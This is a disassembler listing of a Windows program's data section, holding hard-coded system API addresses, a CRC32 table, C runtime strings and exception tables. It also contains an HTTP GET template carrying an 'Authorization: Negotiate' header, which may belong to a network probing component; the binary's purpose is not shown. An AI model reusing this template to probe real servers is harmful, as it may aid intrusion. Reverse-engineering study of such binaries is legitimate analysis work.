dword_427020 dd 77E7FF2Eh ; DATA XREF: sub_423FB9:loc_424009�r
; sub_424030:loc_424083�r
dword_427024 dd 77E78406h ; DATA XREF: sub_423B0B+FF�r
; sub_423B0B+166�r ...
dword_427028 dd 77E79C3Dh ; DATA XREF: sub_423B0B+158�r
; sub_423DD1+143�r
dword_42702C dd 77E7C931h ; DATA XREF: sub_423B0B+19D�r
dword_427030 dd 77E77EE1h ; DATA XREF: sub_4239D9+9�r
dword_427034 dd 77E67702h ; DATA XREF: sub_4239D9:loc_423A08�r
; sub_4239D9+E1�r
dword_427038 dd 77E7C9E1h ; DATA XREF: sub_4239D9+CE�r
dword_42703C dd 77E9C5B1h ; DATA XREF: sub_4239D9+11F�r
dword_427040 dd 77EB9A84h ; DATA XREF: sub_4234F7+138�r
dword_427044 dd 77E781F9h ; DATA XREF: sub_4232A8+42�r
; sub_4232A8+14D�r ...
dword_427048 dd 77E77405h ; DATA XREF: sub_4232A8+5E�r
; sub_4232A8+A7�r ...
dword_42704C dd 77F522F2h ; DATA XREF: sub_422EA8+58�r
dword_427050 dd 77E6D706h ; DATA XREF: sub_42194C+215�r
; sub_426587+2E�r
dword_427054 dd 77E6C703h ; DATA XREF: sub_4208E2+1A�r
dword_427058 dd 77E7A13Fh ; DATA XREF: sub_4208E2+2F�r
dword_42705C dd 77E7849Fh ; DATA XREF: sub_420749+48�r
; sub_420988+14�r
dword_427060 dd 77E73196h ; DATA XREF: sub_424F9C+C�r
dword_427064 dd 77E7980Ah ; DATA XREF: sub_41ED74+76�r
; sub_41EE25+51�r ...
dword_427068 dd 77E79E34h ; DATA XREF: sub_41E742+240�r
; sub_41F216+120�r ...
dword_42706C dd 77E75CB5h ; DATA XREF: sub_40111D+DF�r
; sub_401221+7A�r ...
dword_427070 dd 77E77963h ; DATA XREF: sub_40111D+B8�r
; sub_401221+2DB�r ...
dword_427074 dd 77E61BB8h ; DATA XREF: sub_40111D+A7�r
; sub_401221+2C3�r ...
dword_427078 dd 77E7A099h ; DATA XREF: sub_40111D+83�r
; sub_401221+DA�r ...
dword_42707C dd 77E704FCh ; DATA XREF: sub_40111D+74�r
; sub_401221+C4�r ...
dword_427080 dd 77E61BE6h ; DATA XREF: sub_40111D+29�r
; sub_401221+1F4�r ...
dword_427084 dd 77E7AC37h ; DATA XREF: sub_401221+3C1�r
; sub_401ACD+79F�r ...
dword_427088 dd 77E73628h ; DATA XREF: sub_401221+33B�r
; sub_401ACD+76D4�r ...
dword_42708C dd 77E706B7h ; DATA XREF: sub_401221:loc_401495�r
; sub_41761C+15�r ...
dword_427090 dd 77E80656h ; DATA XREF: sub_401221:loc_401488�r
dword_427094 dd 77F5157Dh ; DATA XREF: sub_401221+1D8�r
; sub_401221+3E6�r ...
dword_427098 dd 77E6BD13h ; DATA XREF: sub_401221:loc_4013DC�r
dword_42709C dd 77E70396h ; DATA XREF: sub_401221+1B5�r
; sub_401221+221�r ...
dword_4270A0 dd 77E74CABh ; DATA XREF: sub_401221+19E�r
; sub_4100B4+110�r ...
dword_4270A4 dd 77E79F93h ; DATA XREF: sub_401221+D3�r
; sub_409909+2�r ...
dword_4270A8 dd 77E79D5Bh ; DATA XREF: sub_401221+6B�r
; sub_401221+311�r ...
dword_4270AC dd 77E7C2C4h ; DATA XREF: sub_401221+64�r
dword_4270B0 dd 77E7751Ah ; DATA XREF: sub_401221+2C�r
; sub_401ACD+253B�r ...
dword_4270B4 dd 77E75CEBh ; DATA XREF: sub_401ACD+791A�r
; sub_40B4F5+2B�r ...
dword_4270B8 dd 77E6AD34h ; DATA XREF: sub_401ACD+68CF�r
; sub_4188A6+35�r
dword_4270BC dd 77E71AFEh ; DATA XREF: sub_401ACD+6697�r
dword_4270C0 dd 77E805D8h ; DATA XREF: sub_409909+13A�r
; sub_409909:loc_409E17�r ...
dword_4270C4 dd 77E7A5FDh ; DATA XREF: sub_409909+11�r
; sub_4172C1+60�r ...
dword_4270C8 dd 77E65F4Ch ; DATA XREF: .text:0040ABED�r
; sub_419AE0+34�r
dword_4270CC dd 77E7513Ch ; DATA XREF: .text:0040AC84�r
; .text:0040B0C3�r
dword_4270D0 dd 77E7C657h ; DATA XREF: .text:0040ACF8�r
; .text:0040AF0F�r ...
dword_4270D4 dd 77E73C49h ; DATA XREF: sub_40B425+4A�r
; sub_40BB65+1AF�r ...
dword_4270D8 dd 77F7E300h ; DATA XREF: sub_40C3E8+142�r
dword_4270DC dd 77F7E21Fh ; DATA XREF: sub_40C3E8+D7�r
dword_4270E0 dd 77E7C706h ; DATA XREF: sub_40C600+77�r
dword_4270E4 dd 77F53275h ; DATA XREF: sub_40C600+6B�r
; sub_40C600+22F�r
dword_4270E8 dd 77E77CCEh ; DATA XREF: sub_40DB5E+66�r
; sub_40DC41+65�r ...
dword_4270EC dd 77E78B82h ; DATA XREF: .text:0040E081�r
; sub_40EED1+25�r ...
dword_4270F0 dd 77E79D8Ch ; DATA XREF: .text:0040E04F�r
; sub_40EE8E+3B�r ...
dword_4270F4 dd 77E73EACh ; DATA XREF: .text:0040E035�r
dword_4270F8 dd 77E7A837h ; DATA XREF: .text:0040DFB4�r
; sub_4100B4+1CB�r ...
dword_4270FC dd 77E616B4h ; DATA XREF: sub_40EF1C+19B�r
; sub_4116D6+115�r ...
dword_427100 dd 77E79CE3h ; DATA XREF: sub_40EF1C+111�r
; sub_411920+77�r ...
dword_427104 dd 77E79C90h ; DATA XREF: sub_40EF1C+FD�r
; sub_40EF1C+10A�r ...
dword_427108 dd 77E7727Ah ; DATA XREF: sub_40EF1C+74�r
; sub_411827+23�r ...
dword_42710C dd 77E64106h ; DATA XREF: sub_40FF31+A0�r
; sub_41AF8F+1B6�r
dword_427110 dd 77E64006h ; DATA XREF: sub_40FF31+8C�r
; sub_41AF8F+19F�r
dword_427114 dd 77E793EFh ; DATA XREF: sub_4100B4+1F5�r
; sub_4109F1+38�r ...
dword_427118 dd 77E79424h ; DATA XREF: sub_41036B+280�r
; sub_41761C+135�r
dword_42711C dd 77E794BFh ; DATA XREF: sub_41036B+272�r
; sub_41761C+123�r
dword_427120 dd 77E75E67h ; DATA XREF: sub_41036B+212�r
; sub_41036B+5DB�r ...
dword_427124 dd 77E75D9Eh ; DATA XREF: sub_41036B+201�r
; sub_41716F+26�r
dword_427128 dd 77E78C81h ; DATA XREF: sub_4109F1+6C�r
; sub_4161C1+259�r ...
dword_42712C dd 77E76968h ; DATA XREF: sub_41144E+5F�r
dword_427130 dd 77E74C59h ; DATA XREF: sub_4116D6+C7�r
dword_427134 dd 77EC7C51h ; DATA XREF: sub_411AAB+5E�r
dword_427138 dd 77E802FCh ; DATA XREF: sub_413694+18C�r
; sub_413694+2D4�r ...
dword_42713C dd 77E6D75Bh ; DATA XREF: sub_413694+182�r
; sub_4143F7+FF�r
dword_427140 dd 77E70F89h ; DATA XREF: sub_415D38+D�r
dword_427144 dd 77E80618h ; DATA XREF: sub_4172C1+170�r
; sub_418AF1+D4�r
dword_427148 dd 77E78147h ; DATA XREF: sub_4172C1+BC�r
dword_42714C dd 77F51597h ; DATA XREF: sub_417493+41�r
; sub_417493+F5�r ...
dword_427150 dd 77F516F8h ; DATA XREF: sub_417493+21�r
; sub_41761C+4A�r ...
dword_427154 dd 77E77CB7h ; DATA XREF: sub_417493+10�r
; sub_41761C+40�r ...
dword_427158 dd 77E7F01Ah ; DATA XREF: sub_41761C+88�r
; sub_4177C3+55�r
dword_42715C dd 77E61A54h ; DATA XREF: sub_41761C+56�r
; sub_4177C3+97�r
dword_427160 dd 77E7C3A5h ; DATA XREF: sub_41761C+34�r
; sub_4177C3+2E�r
dword_427164 dd 77E76A60h ; DATA XREF: sub_418699+2D�r
dword_427168 dd 77E71B14h ; DATA XREF: sub_418723+26�r
dword_42716C dd 77E7166Fh ; DATA XREF: sub_418723+1D�r
dword_427170 dd 77E75090h ; DATA XREF: sub_41875E+69�r
dword_427174 dd 77E74D76h ; DATA XREF: sub_41875E+36�r
dword_427178 dd 77E77797h ; DATA XREF: sub_41875E+25�r
dword_42717C dd 77E7011Ah ; DATA XREF: sub_4187E0+96�r
dword_427180 dd 77E73CE2h ; DATA XREF: sub_4187E0+60�r
dword_427184 dd 77E668D9h ; DATA XREF: sub_4188A6+15D�r
dword_427188 dd 77E79924h ; DATA XREF: sub_4190A5+13�r
; sub_4232A8+20D�r ...
dword_42718C dd 77E76A2Eh ; DATA XREF: sub_419C09+DE�r
dword_427190 dd 77E7FF65h ; DATA XREF: sub_41A05C+5A�r
dword_427194 dd 77EB7624h ; DATA XREF: sub_41A05C+3D�r
dword_427198 dd 77E6C29Dh ; DATA XREF: sub_41A6EA+1EB�r
dword_42719C dd 77E76C1Ah ; DATA XREF: sub_41AF8F+1CF�r
dword_4271A0 dd 77F5722Fh ; DATA XREF: sub_41BBE2+110�r
; sub_41BBE2+22D�r ...
dword_4271A4 dd 77F6183Eh ; DATA XREF: sub_426356�r
dword_4271A8 dd 77E6177Ah ; DATA XREF: .text:0041E272�r
; sub_423B0B+59�r
dword_4271AC dd 77E7C938h ; DATA XREF: .text:0041E247�r
dword_4271B0 dd 77E7C486h ; DATA XREF: .text:0041E1F9�r
dword_4271B4 dd 77E7AC5Eh ; DATA XREF: sub_41E52A+54�r
dword_4271B8 dd 77E76E0Bh ; DATA XREF: sub_41E672+50�r
dword_4271BC dd 77E7C726h ; DATA XREF: sub_41E672+11�r
dd 0
dword_4271C4 dd 71AB5A01h ; DATA XREF: sub_4157BA+20�r
dword_4271C8 dd 71AB4122h ; DATA XREF: sub_4156D1+D4�r
dword_4271CC dd 71AB1746h ; DATA XREF: sub_4131EC+1DE�r
dword_4271D0 dd 71AB401Ch ; DATA XREF: sub_4131EC+21B�r
; sub_4131EC+243�r
dword_4271D4 dd 71AB1836h ; DATA XREF: sub_40F9BF+6E�r
; sub_40FA3C+8E�r
dword_4271D8 dd 71AB41DAh ; DATA XREF: sub_40F3AA+4A�r
; sub_40F9BF+15�r
dword_4271DC dd 71AB3F8Dh ; DATA XREF: sub_40F3AA+5A�r
dword_4271E0 dd 71AB155Ah ; DATA XREF: sub_40F3AA+8D�r
; sub_414251+70�r ...
dword_4271E4 dd 71AB3ECEh ; DATA XREF: sub_40F3AA+B5�r
dword_4271E8 dd 71AB5DE2h ; DATA XREF: sub_40F3AA+C9�r
dword_4271EC dd 71AB868Dh ; DATA XREF: sub_40F3AA+171�r
dword_4271F0 dd 71AB12F8h ; DATA XREF: sub_40E9FB+27�r
; sub_40F9BF+35�r ...
dword_4271F4 dd 71AB1746h ; DATA XREF: sub_40E9FB+36�r
; sub_40F9BF+41�r ...
dword_4271F8 dd 71AB3E5Dh ; DATA XREF: sub_40E9FB+59�r
; sub_40EAE9+45�r ...
dword_4271FC dd 71AB5690h ; DATA XREF: sub_40E9FB+6A�r
; sub_40F3AA+1E1�r
dword_427200 dd 71AB1A6Dh ; DATA XREF: sub_40E9FB+E0�r
; sub_40EAE9:loc_40EB55�r ...
dword_427204 dd 71AB3C22h ; DATA XREF: .text:0040D64C�r
; sub_40E9FB+45�r ...
dword_427208 dd 71AB1AF4h ; DATA XREF: sub_40D2A2+12�r
; sub_40E9FB+C3�r ...
dword_42720C dd 71AB1890h ; DATA XREF: sub_40D104+4C�r
; sub_40F3AA+106�r
dword_427210 dd 71AB1B7Bh ; DATA XREF: sub_426350�r
dword_427214 dd 71AB157Eh ; DATA XREF: sub_401ACD+2F5F�r
align 10h
dword_427220 dd 0 ; DATA XREF: sub_401070+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_427620 dd 2Eh ; DATA XREF: sub_401ACD+3428�o
; sub_401ACD+3514�o ...
dword_427624 dd 2Eh ; DATA XREF: sub_401ACD+3850�o
; sub_401ACD+388A�o ...
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40D4E2+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 8
dbl_427668 dq 1.388888888888889e-2 ; DATA XREF: sub_40D2F4+2F�r
dbl_427670 dq 1.666666666666667e-1 ; DATA XREF: sub_40D2F4+15�r
dword_427678 dd 0FFFFFFFFh ; DATA XREF: sub_40D340+16F�r
; sub_40D774�r ...
align 10h
dbl_427680 dq 1.333333333333333 ; DATA XREF: sub_40D340+79�r
dword_427688 dd 2 dup(0) ; DATA XREF: sub_40D4E2+4D�o
; sub_40D824+5B�o ...
dbl_427690 dq 9.765625e-4 ; DATA XREF: sub_4167A0+2BD�r
; sub_4167A0+2D8�r ...
dbl_427698 dq -1.52587890625e-4 ; DATA XREF: sub_417E84+3E5�r
dbl_4276A0 dq 3.0517578125e-4 ; DATA XREF: sub_417E84+3C5�r
dbl_4276A8 dq -3.0517578125e-4 ; DATA XREF: sub_417E84+342�r
; sub_417E84+3A7�r
dbl_4276B0 dq 1.52587890625e-4 ; DATA XREF: sub_417E84+271�r
dbl_4276B8 dq -1.739501953125e-3 ; DATA XREF: sub_417E84+24B�r
; sub_417E84+2D5�r ...
dbl_4276C0 dq 3.11279296875e-3 ; DATA XREF: sub_417E84+E1�r
dbl_4276C8 dq 3.0517578125e-5 ; DATA XREF: sub_417E84+AE�r
; sub_417E84+138�r ...
dbl_4276D0 dq 6.103515625e-5 ; DATA XREF: sub_417E84+93�r
; sub_417E84+308�r
dbl_4276D8 dq 2.288818359375e-3 ; DATA XREF: sub_417E84+21�r
dbl_4276E0 dq -3.0517578125e-5 ; DATA XREF: sub_418BD1+2B�r
flt_4276E8 dd 9.765625e-4 ; DATA XREF: sub_41AA1E+1B0�r
flt_4276EC dd 8.0 ; DATA XREF: sub_41AA1E+1AA�r
flt_4276F0 dd 0.0 ; DATA XREF: sub_41AA1E+171�r
flt_4276F4 dd 1.0e-3 ; DATA XREF: sub_41AA1E+168�r
dbl_4276F8 dq 1.0 ; DATA XREF: sub_41D055+6C�r
; sub_41D19B+6C�r ...
dword_427700 dd 0FFFFFFFFh, 41E2AAh, 41E2BEh ; DATA XREF: .text:0041E1D8�o
a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_41E52A+8E�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_41E52A+4F�o
align 4
byte_42773C db 6 ; DATA XREF: sub_41FF3F:loc_41FF96�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_43D094�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_43D090�o
align 10h
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAtan db 'atan',0
align 4
aAcos db 'acos',0
align 10h
aAsin db 'asin',0
align 4
aTanh db 'tanh',0
align 10h
aCosh db 'cosh',0
align 4
aSinh db 'sinh',0
align 10h
aLog10 db 'log10',0
align 4
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: .data:off_43D30C�o
dbl_427860 dq 0.0 ; DATA XREF: sub_421BFF+8C�r
; sub_421BFF+AC�r ...
dbl_427868 dq 4.195835e6 ; DATA XREF: sub_422114+F�r
dbl_427870 dq 3.145727e6 ; DATA XREF: sub_422114+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_422152+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_422152�o
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_422279+93�o
align 4
dword_4278A8 dd 0FFFFFFFFh, 422964h, 42296Eh, 0 ; DATA XREF: sub_4228FD+5�o
dword_4278B8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_422A2C+5�o
dd offset sub_422AEA
align 8
dd offset sub_422AC8
dd offset sub_422AD2
dword_4278D0 dd 0FFFFFFFFh, 422D1Ah, 422D1Eh, 0 ; DATA XREF: sub_422B62+5�o
dword_4278E0 dd 0FFFFFFFFh, 422D7Ch, 422D85h, 0 ; DATA XREF: sub_422D26+5�o
dword_4278F0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_422DFC+5�o
dd offset loc_422E4D
align 10h
dd offset loc_422E39
dd offset loc_422E3D
dword_427908 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_422E52+5�o
dd offset loc_422EA3
align 8
dd offset loc_422E8F
dd offset loc_422E93
dword_427920 dd 2 dup(0) ; DATA XREF: sub_4232A8+36�o
; sub_4244F4+39�o ...
dword_427928 dd 0FFFFFFFFh, 4233B8h, 4233BCh, 0FFFFFFFFh, 42346Ch, 423470h
; DATA XREF: sub_4232A8+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_43D4DC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_423DD1+119�o
align 10h
asc_427BF0 db 0Ah ; DATA XREF: sub_423DD1+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_423DD1+D3�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_423DD1+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_423DD1+7D�o
align 10h
dword_427C30 dd 0FFFFFFFFh, 4245EDh, 4245F1h ; DATA XREF: sub_4244F4+5�o
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_425029+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_425029+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_425029+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_425973:loc_425A68�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_425973+D8�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_425973+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_425973+AD�o
align 4
dd offset dword_427DAC
off_427C90 dd offset sub_4260E2 ; DATA XREF: sub_4260BA+8�o
; sub_4260FE+2C�o ...
dd offset sub_4260D5
dd offset sub_4262F6
dd offset dword_427DF8
off_427CA0 dd offset sub_42614C ; DATA XREF: sub_4260FE+3A�o
; sub_426168�o ...
dd offset sub_4260D5
dd offset loc_426332
dword_427CAC dd 0 ; DATA XREF: sub_4260FE+16�o
; sub_4261D0+16�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_426173+11�o
dd offset dword_427E44
off_427CCC dd offset sub_42625B ; DATA XREF: sub_426277�o
; sub_42629A+37�o ...
dd offset sub_4260D5
dd offset loc_426314
aStringTooLong db 'string too long',0 ; DATA XREF: sub_42629A+11�o
dd offset dword_427E88
off_427CEC dd offset sub_4264A5 ; DATA XREF: sub_426490�o
; .data:off_43DAE4�o ...
dd offset dword_427EB8
off_427CF4 dd offset sub_4264C1 ; DATA XREF: sub_4264DD+8�o
; sub_42651A+8�o ...
dd offset sub_42657A
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_42657A+7�o
align 10h
dword_427D10 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_426587+E�o
dd 3, 19930520h, 2 dup(0)
dword_427D30 dd 0FFFFFFFFh, 426738h, 42673Ch, 0FFFFFFFFh, 4267B5h, 4267B9h
; DATA XREF: sub_426636+5�o
dword_427D48 dd 0FFFFFFFFh, 4269ADh, 4269B1h, 0FFFFFFFFh, 426A0Ah, 426A0Eh
; DATA XREF: sub_4268C1+5�o
dd 43DAE4h, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_427D78 dd offset off_43DAFC ; DATA XREF: .rdata:00427D90�o
; .rdata:00427DDC�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427D78
dd offset dword_427D48+18h
dword_427D98 dd 3 dup(0) ; DATA XREF: .rdata:00427DBC�o
dd 2, 427D90h
dword_427DAC dd 3 dup(0) ; DATA XREF: .rdata:00427C8C�o
dd offset off_43DAFC
dd offset dword_427D98+4
off_427DC0 dd offset off_43DB1C ; DATA XREF: .rdata:00427DD8�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427DC0
dd offset off_427D78
dd offset dword_427D48+18h
dd 0
db 0 ; DATA XREF: .rdata:00427E08�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 427DD8h
dword_427DF8 dd 3 dup(0) ; DATA XREF: .rdata:00427C9C�o
dd offset off_43DB1C
dd offset unk_427DE8
off_427E0C dd offset off_43DB3C ; DATA XREF: .rdata:00427E24�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427E0C
dd offset off_427D78
dd offset dword_427D48+18h
dword_427E30 dd 3 dup(0) ; DATA XREF: .rdata:00427E54�o
dd 3, 427E24h
dword_427E44 dd 3 dup(0) ; DATA XREF: .rdata:00427CC8�o
dd offset off_43DB3C
dd offset dword_427E30+4
off_427E58 dd offset off_43DB60 ; DATA XREF: .rdata:00427E70�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427E58
dd 0
db 0 ; DATA XREF: .rdata:00427E98�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 427E70h
dword_427E88 dd 3 dup(0) ; DATA XREF: .rdata:00427CE8�o
dd offset off_43DB60
dd offset unk_427E78
dd offset dword_427D48+18h
dword_427EA0 dd 4 dup(0) ; DATA XREF: .rdata:00427EC8�o
dd 1, 427E9Ch
dword_427EB8 dd 3 dup(0) ; DATA XREF: .rdata:00427CF0�o
dd offset off_43DAE4
dd offset dword_427EA0+8
align 10h
dword_427ED0 dd 19930520h, 2, 427EF0h, 5 dup(0) ; DATA XREF: .text:loc_426AA7�o
dd 0FFFFFFFFh, 426A90h, 0
dd offset sub_426A88
dword_427F00 dd 19930520h, 2, 427F20h, 5 dup(0) ; DATA XREF: .text:loc_426AC4�o
dd 0FFFFFFFFh, 426AB4h, 0
dd offset sub_426ABC
dword_427F30 dd 19930520h, 2, 427F50h, 1, 427F60h, 3 dup(0)
; DATA XREF: .text:loc_426AD0�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 427F78h, 4 dup(0)
dd offset loc_40DA8E
dd 0FFFFFFFFh, 426ADAh
dword_427F90 dd 19930520h, 1, 427F88h, 5 dup(0) ; DATA XREF: .text:loc_426AE2�o
dd offset off_43DAE4
align 8
dd 0FFFFFFFFh, 0
dd 0Ch, 42651Ah, 0
dd offset off_43DAFC
dd 0
dd 0FFFFFFFFh, 0
